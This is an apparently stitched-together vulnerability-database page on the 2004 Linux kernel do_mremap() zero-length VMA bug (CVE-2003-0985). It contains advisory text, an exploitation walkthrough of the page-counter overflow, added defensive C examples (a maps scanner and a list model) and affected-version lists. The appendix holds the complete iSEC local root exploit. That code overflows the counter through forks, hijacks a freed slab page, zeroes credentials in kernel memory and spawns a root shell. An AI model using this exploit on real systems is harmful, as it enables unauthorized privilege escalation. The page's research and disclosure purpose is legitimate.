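The zero-length entry is visible in the process's maps listing as a range whose start equals its end. The page's second proof-of-concept (EDBID:142) looks for it by searching the listing for one fixed address; the scanner below, an added example that is not part of the advisory or of any PoC on this page, applies the general check (start == end) to any /proc/<pid>/maps-style text and to the calling process's own map. The sample listing inside it is constructed from the advisory's layout so the code runs offline.

```c
/* Added example, not part of the advisory: a scanner that parses
 * /proc/<pid>/maps-style text and reports every VMA whose start equals its
 * end, the symptom marked [*] above. The sample listing below is constructed
 * from the advisory's layout so the code runs offline. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct zero_vma {
    unsigned long addr;
    char perms[5];
};

/* Parse one maps line "start-end perms ...". Returns 1 on success,
 * 0 for a blank line, -1 if the line does not look like a maps entry. */
int parse_maps_line(const char *line, unsigned long *start,
                    unsigned long *end, char perms[5])
{
    if (line[0] == '\0' || line[0] == '\n')
        return 0;
    return sscanf(line, "%lx-%lx %4s", start, end, perms) == 3 ? 1 : -1;
}

/* Scan a whole maps text. Stores up to max hits in out (out may be NULL when
 * max is 0) and returns the total number of zero-length VMAs, or -1 on a
 * malformed or over-long line. */
int find_zero_length_vmas(const char *maps, struct zero_vma *out, int max)
{
    int found = 0;
    while (*maps) {
        char line[512];
        const char *nl = strchr(maps, '\n');
        size_t len = nl ? (size_t)(nl - maps) : strlen(maps);
        if (len >= sizeof line) return -1;
        memcpy(line, maps, len); line[len] = '\0';
        maps += len + (nl != NULL);

        unsigned long s, e; char perms[5];
        int r = parse_maps_line(line, &s, &e, perms);
        if (r < 0)
            return -1;
        if (r == 1 && s == e) {
            if (found < max) {
                out[found].addr = s;
                memcpy(out[found].perms, perms, sizeof perms);
            }
            found++;
        }
    }
    return found;
}

/* Same check on the calling process's live map. Returns the count, or -1 if
 * /proc is unavailable or a line is malformed or longer than the buffer. */
int scan_self_maps(void)
{
    FILE *fp = fopen("/proc/self/maps", "r");
    if (!fp)
        return -1;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, fp)) {
        unsigned long s, e; char perms[5];
        int r = parse_maps_line(line, &s, &e, perms);
        if (r < 0) { fclose(fp); return -1; }
        if (r == 1 && s == e)
            found++;
    }
    fclose(fp);
    return found;
}

/* Constructed sample in the advisory's layout, including the [*] entry. */
static const char SAMPLE_MAPS[] =
    "08048000-0804c000 r-xp 00000000 03:05 959142     /tmp/test\n"
    "0804c000-0804d000 rw-p 00003000 03:05 959142     /tmp/test\n"
    "0804d000-0804e000 rwxp 00000000 00:00 0\n"
    "4015d000-4015f000 rw-p 00000000 00:00 0\n"
    "60000000-60000000 rwxp 00000000 00:00 0\n"
    "bfffe000-c0000000 rwxp fffff000 00:00 0\n";

/* Address of the first zero-length VMA in the sample, 0 if none. */
unsigned long sample_first_zero_vma(void)
{
    struct zero_vma hits[8];
    return find_zero_length_vmas(SAMPLE_MAPS, hits, 8) > 0 ? hits[0].addr : 0;
}

int main(void)
{
    struct zero_vma hits[8];
    int n = find_zero_length_vmas(SAMPLE_MAPS, hits, 8);
    printf("sample listing: %d zero-length VMA(s)\n", n);
    for (int i = 0; i < n && i < 8; i++)
        printf("  %08lx-%08lx %s\n", hits[i].addr, hits[i].addr, hits[i].perms);
    printf("this process: %d zero-length VMA(s)\n", scan_self_maps());
    return 0;
}
```

On the sample the scanner reports exactly one hit, 60000000-60000000 rwxp; on a kernel that rejects zero-length remaps, scan_self_maps() reports 0 for the running process. Because the check is on the start/end pair rather than on a particular address, it also catches the multiple 60000000-60000000 descriptors the advisory shows later.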


Exploitation:
=============

The iSEC team has identified multiple attack vectors for the bug discovered. 
In this section we want to describe the page counter method however we strongly
believe that a much faster and more convenient method exists.

As mentioned above a VMA of 0 bytes in size can be introduced into the process's
virtual memory list. Its unusual size renders such a VMA partially invisible to 
the kernel main VM helper routine called find_vma(). The find_vma(ADDR) function
returns the first VMA descriptor (START, END) from the current process's list
satisfying ADDR < END or NULL if none. Obviously given a VMA starting and ending
at the same address ADDR the condition is violated if one searches for ADDR's VMA
thus the next VMA in the list will be returned.

The mremap() code calls the insert_vm_struct() helper function after creating
the bogus VMA descriptor in kernel memory which in turn checks the new location
calling the find_vma() helper which returns the wrong result if a zero sized VMA
is already present in the new location. Therefore it is possible to introduce 
multiple bogus VMA descriptors for the same virtual memory address. This happens only
if the adjacent zero sized VMAs differ in their descriptor flags because otherwise
they will be linked together in insert_vm_struct(). 

Later the process virtual memory list could look like:

    08048000-080a2000 r-xp 00000000 03:02 53159      /tmp/test
    080a2000-080a5000 rw-p 00059000 03:02 53159      /tmp/test
    080a5000-080a6000 rwxp 00000000 00:00 0
    40000000-40001000 r--p 00000000 00:00 0
    60000000-60000000 r--p 00000000 00:00 0
    60000000-60000000 rw-p 00000000 00:00 0
    60000000-60000000 r--p 00000000 00:00 0
    60000000-60001000 rwxp 00000000 00:00 0
    bffff000-c0000000 rwxp 00000000 00:00 0
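The two properties described above (find_vma() skipping a VMA whose start equals its end, and the overlap check in insert_vm_struct() therefore accepting repeated zero-length descriptors unless they merge with a neighbour of identical flags) can be reproduced in a small user-space model. The code below is an added example; it is not kernel code and not the advisory's proof of concept. The list layout, the merge rule and the "reject a zero-length request" guard in mremap_model() are simplifications assumed for illustration, not a quotation of the 2.4.24 fix; the guard only shows where a degenerate-length check stops the duplicate descriptors from being created.

```c
/* Added example (not kernel code, not the advisory's PoC): a user-space model
 * of a sorted VMA list, the find_vma() rule quoted above, and mremap-style
 * insertion. The merge rule and the zero-length guard are assumptions made
 * for illustration, not the 2.4.24 fix itself. */
#include <stdio.h>
#include <stdlib.h>

#define PAGE_SZ  0x1000UL
#define VM_READ  1u
#define VM_WRITE 2u

struct vma {
    unsigned long start, end;   /* covers [start, end) */
    unsigned flags;
    struct vma *next;           /* list kept sorted by start */
};

/* First VMA with addr < end, else NULL. A VMA with start == end == addr
 * fails addr < end, so the lookup skips it. */
struct vma *find_vma(struct vma *head, unsigned long addr)
{
    for (struct vma *v = head; v; v = v->next)
        if (addr < v->end)
            return v;
    return NULL;
}

/* Insert [start, end). Returns 0 if a descriptor was added, 1 if merged into
 * the preceding VMA with identical flags, -1 if it overlaps a visible VMA. */
int insert_vma(struct vma **head, unsigned long start, unsigned long end,
               unsigned flags)
{
    struct vma *hit = find_vma(*head, start);
    if (hit && hit->start < end)
        return -1;
    struct vma **pp = head, *prev = NULL;
    while (*pp && (*pp)->start <= start) { prev = *pp; pp = &(*pp)->next; }
    if (prev && prev->end == start && prev->flags == flags) {
        prev->end = end;            /* adjacent and compatible: merge */
        return 1;
    }
    struct vma *n = malloc(sizeof *n);
    if (!n) exit(1);
    n->start = start; n->end = end; n->flags = flags; n->next = *pp;
    *pp = n;
    return 0;
}

/* mremap-style placement of new_len bytes at new_addr. With reject_zero_len
 * set, a request that page-aligns to 0 bytes is refused (assumed guard). */
int mremap_model(struct vma **head, unsigned long new_addr,
                 unsigned long new_len, unsigned flags, int reject_zero_len)
{
    new_len = (new_len + PAGE_SZ - 1) & ~(PAGE_SZ - 1);
    if (reject_zero_len && new_len == 0)
        return -1;
    return insert_vma(head, new_addr, new_addr + new_len, flags) < 0 ? -1 : 0;
}

/* Replay the advisory's scenario: text and stack VMAs, then four zero-length
 * requests at 0x60000000 (three with alternating flags, one repeating the
 * last flags). Returns how many descriptors remain at that address. */
int zero_vma_scenario(int reject_zero_len)
{
    struct vma *head = NULL;
    insert_vma(&head, 0x08048000UL, 0x0804c000UL, VM_READ);            /* text  */
    insert_vma(&head, 0xbffff000UL, 0xc0000000UL, VM_READ | VM_WRITE); /* stack */
    for (int i = 0; i < 3; i++)
        mremap_model(&head, 0x60000000UL, 0,
                     (i & 1) ? (VM_READ | VM_WRITE) : VM_READ, reject_zero_len);
    mremap_model(&head, 0x60000000UL, 0, VM_READ, reject_zero_len);   /* merges */
    int n = 0;
    for (struct vma *v = head; v; v = v->next) n += (v->start == 0x60000000UL);
    while (head) { struct vma *t = head->next; free(head); head = t; }
    return n;
}

/* Where find_vma(0x60000000) lands once a zero-length VMA sits there: the
 * stack's start, because the zero-length descriptor is skipped. */
unsigned long lookup_after_zero_vma(void)
{
    struct vma *head = NULL;
    insert_vma(&head, 0xbffff000UL, 0xc0000000UL, VM_READ | VM_WRITE);
    mremap_model(&head, 0x60000000UL, 0, VM_READ, 0);
    struct vma *v = find_vma(head, 0x60000000UL);
    unsigned long s = v ? v->start : 0;
    while (head) { struct vma *t = head->next; free(head); head = t; }
    return s;
}

int main(void)
{
    printf("guard off: %d descriptors at 0x60000000\n", zero_vma_scenario(0));
    printf("guard on:  %d descriptors at 0x60000000\n", zero_vma_scenario(1));
    printf("find_vma(0x60000000) -> 0x%lx\n", lookup_after_zero_vma());
    return 0;
}
```

With the guard off, three descriptors accumulate at 0x60000000 (the fourth request merges into the third, exactly the flags condition the advisory states), and find_vma(0x60000000) answers with the stack VMA rather than any of them. With the guard on, the request is refused before a descriptor exists, which is the property a fixed do_mremap() must provide regardless of how the check is worded.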


Further we have found that there is an off-by-one increment inside the
copy_page_range() function for the page counter of the first VMA page directly
following a zero sized VMA area. This is not a bug in the copy_page_range()
code, it is just a feature for a combined zero and non-zero VMA. The copy_page_range
function is called on fork() to copy the parent's page tables into the child process.

Moreover we must note that it is possible to remove a zero-sized VMA from the 
virtual memory list if another suitable VMA is mapped directly below the starting
address of the 0-VMA. Suitable means that the new VMA must have exactly the same
attributes (read, exec, etc) as the following zero-sized VMA and must not map a 
file. This again is a feature of the mmap() system call which will try to 
minimize the number of used VMA descriptors, merging them if possible. Note that
merging the VMAs doesn't influence any page counters in following VMAs.

Combining the findings above we conclude that it is possible to arbitrarily 
increment the page counter of the first VMA page by repeatedly forking a 
process with a zero-sized VMA 'sandwich'. Cleanup must be done in the child 
before it can exit() otherwise the kernel would print a nasty error message
while trying to remove the bogus VMA mappings.

The goal is to overflow the page counter to become 1 again in the child process.
If the corresponding VMA is unmapped now, the page counter will become 0 and the
page returned to the kernel memory management. Note that the parent will still 
hold a reference to the freed page in its page table thus making a manipulation 
of kernel memory possible.

Let's take a closer look at the incrementing of the page counter. 
We can introduce M (marked with A's and B's) 0-sized VMAs directly before the
victim VMA hosting the page we want the counter to overflow. If the victim maps
anonymous memory, the first write access to the victim VMA page (marked with P)
will allocate and insert a fresh page frame into the process's page table and
the page counter will be set to 1:

[A][B][A][B] ... [A][P  VICTIM  ]

After the first fork() P's page counter will become 1 + M + 1 where the first
one is for the original copy in the parent, M for the bogus VMAs and one for
the copy in the child. Cleaning up the 0-VMAs in the child will not change the
page counter, however it will be decremented by one on the child's exit. Thus after
the first fork()-exit() pair it will become 1 + M. We can conclude for N forks,
taking integer overflows into account, that without the final exit() call in the
child the following equation holds:

1 + M*N + 1 = 1

or that

M*N = 2^32-1 = 3 * 5 * 17 * 257 * 65537

Thus we can for example choose to create (3*5*257) 0-sized VMAs and fork the
parent (17*65537) times to overflow P's page counter. This may be a quite 
longish task. Times ranging from about one hour on a fast machine to more than
10 hours have been observed.
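The counter equation above, worked through as an added note that is not part of the advisory: the page counter is a 32-bit unsigned value, so "1 + M*N + 1 = 1" is a congruence modulo 2^32, and the factorization the advisory states is the product of the five Fermat numbers obtained by repeated differences of squares.

```latex
\begin{aligned}
1 + MN + 1 &\equiv 1 \pmod{2^{32}} \\
MN &\equiv -1 \equiv 2^{32} - 1 \pmod{2^{32}} \\
2^{32} - 1 &= (2^{16} - 1)(2^{16} + 1) \\
           &= (2^{8} - 1)(2^{8} + 1)(2^{16} + 1) \\
           &= (2^{4} - 1)(2^{4} + 1)(2^{8} + 1)(2^{16} + 1) \\
           &= (2^{2} - 1)(2^{2} + 1)(2^{4} + 1)(2^{8} + 1)(2^{16} + 1) \\
           &= 3 \cdot 5 \cdot 17 \cdot 257 \cdot 65537
\end{aligned}
```

Each factor is prime, so M and N must partition these five primes between them; the advisory's choice M = 3·5·257 = 3855 and N = 17·65537 = 1114129 (NUMVMA and NUMFORK in the appendix code) gives M·N = 4294967295 = 2^32 − 1 exactly. The same arithmetic is the reason a wider or overflow-checked reference counter closes this path: the smallest product that wraps a 64-bit counter is 2^64 − 1, and the number of forks needed for any feasible M becomes impractically large.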

Further exploitation proves to be easy because the kernel page management has 
the nice property to use a kind of reversed LRU policy for page allocation.
That means that if a page has been released to the kernel MM subsystem it will 
be returned on a subsequent allocation request. The released page could be for
example allocated to a file mapping we can normally only read from or to kernel 
structures, etc.

It is worth noting that the parent's page reference (PTE) must be unprotected
before we can use it to modify page contents because fork() will mark it as 
read only (for copy-on-write reasons).


Impact:
=======

Since no special privileges are required to use the mremap(2) system
call any process may misuse its unexpected behavior to disrupt the kernel
memory management subsystem. Proper exploitation of this vulnerability may
lead to local privilege escalation including execution of arbitrary code
with kernel level access. Proof-of-concept exploit code has been created 
and successfully tested giving UID 0 shell on vulnerable systems.

All users are encouraged to patch all vulnerable systems as soon as 
appropriate vendor patches are released.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and
performed further research. 


Disclaimer:
===========

This document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether
express or implied.

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

/*
 * Linux kernel mremap() bound checking bug exploit.
 *
 * Bug found by Paul Starzetz <paul@isec.pl>
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE	1
#define MREMAP_FIXED	2

#define str(s) 	#s
#define xstr(s) str(s)

#define DSIGNAL		SIGCHLD
#define CLONEFL		(DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR	0x2000

#define RNDINT		512

#define NUMVMA		(3 * 5 * 257)
#define NUMFORK		(17 * 65537)

#define DUPTO		1000
#define TMPLEN		256

#define __NR_sys_mremap	163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len,
			 unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid, gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


void fatal(const char * msg)
{
	printf("\n");
	if (!errno) {
		fprintf(stderr, "FATAL: %s\n", msg);
	} else {
		perror(msg);
	}

	printf("\nentering endless loop");
	fflush(stdout);
	fflush(stderr);
	while (1) pause();
}

void kernel_code(void * file, loff_t offset, int origin)
{
	int i, c;
	int *v;

	if (!file)
		goto out;

	__asm__("movl	%%esp, %0" : : "m" (c));

	c &= 0xffffe000;
	v = (void *) c;

	for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
		if (v[i] == uid && v[i+1] == uid) {
			i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
		}
		if (v[i] == gid) {
			v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
			break;
		}
	}
out:
	dummy++;
}

void try_to_exploit(void)
{
	int v = 0;

	v += fops[0];
	v += fake_file[0];

	kernel_code(0, 0, v);
	lseek(DUPTO, 0, SEEK_SET);

	if (geteuid()) {
		printf("\nFAILED uid!=0"); fflush(stdout);
		errno =- ENOSYS;
		fatal("uid change");
	}

	printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

	kill(ppid, SIGUSR1);
	setresuid(0, 0, 0);
	sleep(1);

	printf("\n\n"); fflush(stdout);

	execl("/bin/bash", "bash", NULL);
	fatal("burp");
}

void cleanup(int v)
{
	victim[DUPTO] = victim[0];
	kill(0, SIGUSR2);
}


void redirect_filp(int v)
{
	printf("\n[!] parent check race... "); fflush(stdout);

	if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
		printf("SUCCESS, cought SLAB page!"); fflush(stdout);
		victim[DUPTO] = (unsigned) & fake_file;
		signal(SIGUSR1, &cleanup);
		kill(pid, SIGUSR1);
	} else {
		printf("FAILED!");
	}
	fflush(stdout);
}

int get_slab_objs(void)
{
	FILE * fp;
	int c, d, u = 0, a = 0;
	static char line[TMPLEN], name[TMPLEN];

	fp = fopen("/proc/slabinfo", "r");
	if (!fp)
		fatal("fopen");

	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a =- 1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
		c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
	} while (strcmp(name, "size-4096"));
	
	fclose(fp);

	return c == 7 ? a - u : -1;
}

void unprotect(int v)
{
	int n, c = 1;

	*victim = 0;
	printf("\n[+] parent unprotected PTE "); fflush(stdout);

	dup2(0, 2);
	while (1) {
		n = get_slab_objs();
		if (n < 0)
			fatal("read slabinfo");
		if (n > 0) {
			printf("\n    depopulate SLAB #%d", c++);
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
		}
		if (!n) {
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
			dup2(0, DUPTO);
			break;
		}
	}

	signal(SIGUSR1, &redirect_filp);
	kill(pid, SIGUSR1);
}

void cleanup_vmas(void)
{
	int i = NUMVMA;

	while (1) {
		tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
				MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
		if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap1");
		}
		i--;
		if (!i)
			break;

		tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
				MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
		if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap2");
		}
		i--;
		if (!i)
			break;
	}
}

void catchme(int v)
{
	blah++;
}

void exitme(int v)
{
	_exit(0);
}

void childrip(int v)
{
	waitpid(-1, 0, WNOHANG);
}

void slab_helper(void)
{
	signal(SIGUSR1, &catchme);
	signal(SIGUSR2, &exitme);
	blah = 0;

	while (1) {
		while (!blah) pause();

		blah = 0;
		if (!fork()) {
			dup2(0, DUPTO);
			kill(getppid(), SIGUSR1);
			while (1) pause();
		} else {
			while (!blah) pause();
			blah = 0; kill(ppid, SIGUSR2);
		}
	}
	exit(0);
}

int main(void)
{
	int i, r, v, cnt;
	time_t start;

	srand(time(NULL) + getpid());
	ppid = getpid();
	uid = getuid();
	gid = getgid();

	hpid = fork();
	if (!hpid)
		slab_helper();

	fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (fops == MAP_FAILED)
		fatal("mmap fops VMA");
	for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
		fops[i] = (unsigned)&kernel_code;
	for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
		fake_file[i] = (unsigned)fops;

	vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_ro == MAP_FAILED)
		fatal("mmap1");

	vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_rw == MAP_FAILED)
		fatal("mmap2");

	cnt = NUMVMA;
	while (1) {
		r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap1");
		}
		cnt--;
		if (!cnt) break;

		r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap2");
		}
		cnt--;
		if (!cnt) break;
	}

	victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (victim != (void *) PAGEADDR)
		fatal("mmap victim VMA");

	v = *victim;
	*victim = v + 1;

	signal(SIGUSR1, &unprotect);
	signal(SIGUSR2, &catchme);
	signal(SIGCHLD, &childrip);
	printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
	start = time(NULL);

	cnt = NUMFORK;
	v = 0;
	while (1) {
		cnt--;
		v--;
		dummy += *victim;

		if (cnt > 1) {
			__asm__(
			"pusha				\n"
			"movl %1, %%eax			\n"
			"movl $("xstr(CLONEFL)"), %%ebx	\n"
			"movl %%esp, %%ecx		\n"
			"movl $120, %%eax		\n"
			"int  $0x80			\n"
			"movl %%eax, %0			\n"
			"popa				\n"
			: : "m" (pid), "m" (dummy)
			);
		} else {
			pid = fork();
		}

		if (pid) {
			if (v <= 0 && cnt > 0) {
				float eta, tm;
				v = rand() % RNDINT / 2 + RNDINT / 2;
				tm = eta = (float)(time(NULL) - start);
				eta *= (float)NUMFORK;
				eta /= (float)(NUMFORK - cnt);
				printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
				NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
				fflush(stdout);
			}
			if (cnt) {
				waitpid(pid, 0, 0);
				continue;
			}
			if (!cnt) {
				while (1) {
					 r = wait(NULL);
					 if (r == pid) {
					 	cleanup_vmas();
						while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
					 }
				}
			}
		}

		else {
			cleanup_vmas();

			if (cnt > 0) {
				_exit(0);
			}

			printf("\n[+] overflow done, the moment of truth..."); fflush(stdout);
			sleep(1);

			signal(SIGUSR1, &catchme);
			munmap(0, PAGE_SIZE);
			dup2(0, 2);
			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();

			munmap((void *)victim, PAGE_SIZE);
			dup2(0, DUPTO);

			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();
			try_to_exploit();
			while (1) pause();
		}
	}
	return 0;
}


-- 
Paul Starzetz
iSEC Security Research
http://isec.pl/
    

- Vulnerability information (F32438)

isec-0013-mremap.txt (PacketStormID: F32438)
2004-01-05 00:00:00
Wojciech Purczynski, Paul Starzetz (isec.pl)
advisory, arbitrary, kernel, local
linux
CVE-2003-0985

The mremap system call in the Linux kernel memory management code has a critical security vulnerability due to incorrect bounds checking. Proper exploitation of this vulnerability may lead to local privilege escalation including execution of arbitrary code with kernel level access.

Synopsis:  Linux kernel do_mremap local privilege escalation vulnerability
Product:   Linux kernel
Version:   2.2, 2.4 and 2.6 series

Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0013-mremap.txt
CVE:       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0985
Author:    Paul Starzetz <ihaquer@isec.pl>,
           Wojciech Purczynski <cliph@isec.pl>
Date:      January 5, 2004


Issue:
======

A critical security vulnerability has been found in the Linux kernel
memory management code in the mremap(2) system call, due to incorrect
bound checks.


Details:
========

The mremap system call provides the functionality of resizing (shrinking or
growing) existing virtual memory areas (VMAs), or any part of them, as well as
moving them across the process's addressable space.

A typical VMA covers at least one memory page (which is exactly 4kB on
the i386 architecture). An incorrect bound check discovered inside the
do_mremap() kernel code performing remapping of a virtual memory area
may lead to the creation of a virtual memory area of 0 bytes length.

The problem is based on the general mremap flaw that remapping 2 pages
from inside a VMA creates a memory hole of only one page in length but
an additional VMA of two pages. In the case of a zero-sized remapping
request no VMA hole is created, but an additional VMA descriptor of 0
bytes in length is.

Such a malicious virtual memory area may disrupt the operation of other
parts of the kernel memory management subroutines finally leading to 
unexpected behavior.

A typical process's memory layout showing invalid VMA created with
mremap system call:

    08048000-0804c000 r-xp 00000000 03:05 959142     /tmp/test
    0804c000-0804d000 rw-p 00003000 03:05 959142     /tmp/test
    0804d000-0804e000 rwxp 00000000 00:00 0
    40000000-40014000 r-xp 00000000 03:05 1544523    /lib/ld-2.3.2.so
    40014000-40015000 rw-p 00013000 03:05 1544523    /lib/ld-2.3.2.so
    40015000-40016000 rw-p 00000000 00:00 0
    4002c000-40158000 r-xp 00000000 03:05 1544529    /lib/libc.so.6
    40158000-4015d000 rw-p 0012b000 03:05 1544529    /lib/libc.so.6
    4015d000-4015f000 rw-p 00000000 00:00 0
[*] 60000000-60000000 rwxp 00000000 00:00 0
    bfffe000-c0000000 rwxp fffff000 00:00 0

The broken VMA in the above example has been marked with a [*].


Impact:
=======

Since no special privileges are required to use the mremap(2) system
call, any process may misuse its unexpected behavior to disrupt the kernel
memory management subsystem. Proper exploitation of this vulnerability may
lead to local privilege escalation including execution of arbitrary code
with kernel level access. Proof-of-concept exploit code has been created
and successfully tested giving a UID 0 shell on vulnerable systems.

Exploitation of the discovered vulnerability is possible, although not
trivial. We have identified at least two different attack vectors for the
2.4 kernel series. All users are encouraged to patch all vulnerable systems
as soon as appropriate vendor patches are released.



- Vulnerability information

3315
Linux Kernel do_mremap() Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in the Linux kernel. The do_mremap() function fails to perform bounds checking resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2004-01-05 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.4.24 or higher, or 2.6.1 or higher, as they have been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Linux Kernel do_mremap Function Boundary Condition Vulnerability
Boundary Condition Error 9356
No Yes
2004-01-05 12:00:00 2009-07-12 12:56:00
Discovery is credited to Paul Starzetz and Wojciech Purczynski.

- Affected program versions

VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0
VMWare ESX Server 1.5.2
Sun Cobalt RaQ 550
SmoothWall Express 2.0 beta6
SmoothWall Express 2.0 beta
SmoothWall Express 2.0
SGI ProPack 2.4
Linux kernel 2.6.1 -rc1
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.4.21 pre7
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
+ Debian Linux 3.0 ia-32
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
